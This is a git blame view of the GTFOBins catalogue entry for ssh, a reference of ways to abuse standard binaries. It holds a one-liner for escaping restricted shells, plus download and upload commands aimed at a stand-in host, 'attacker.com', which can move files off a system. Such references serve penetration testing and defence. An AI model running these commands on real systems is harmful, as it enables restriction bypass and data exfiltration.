1
0
mirror of https://github.com/GTFOBins/GTFOBins.github.io.git synced 2024-09-20 02:42:45 +02:00
GTFOBins.github.io/_gtfobins/ssh.md

21 lines
577 B
Markdown
Raw Normal View History

2018-05-21 21:14:41 +02:00
---
functions:
2018-05-25 15:30:02 +02:00
execute-interactive:
2018-05-21 21:14:41 +02:00
- description: Reconnecting may help bypassing restricted shells.
2018-05-28 17:47:54 +02:00
code: ssh localhost $SHELL --noprofile --norc
2018-05-21 21:14:41 +02:00
download:
- description: Fetch a remote file from a SSH server.
code: |
2018-05-24 21:59:21 +02:00
HOST=user@attacker.com
2018-05-21 21:14:41 +02:00
RPATH=file_to_get
LPATH=where_to_save
ssh $HOST "cat $RPATH" > $LPATH
upload:
- description: Send local file to a SSH server.
code: |
2018-05-24 21:59:21 +02:00
HOST=user@attacker.com
2018-05-21 21:14:41 +02:00
RPATH=where_to_save
LPATH=file_to_send
ssh $HOST "cat > $RPATH" < $LPATH
---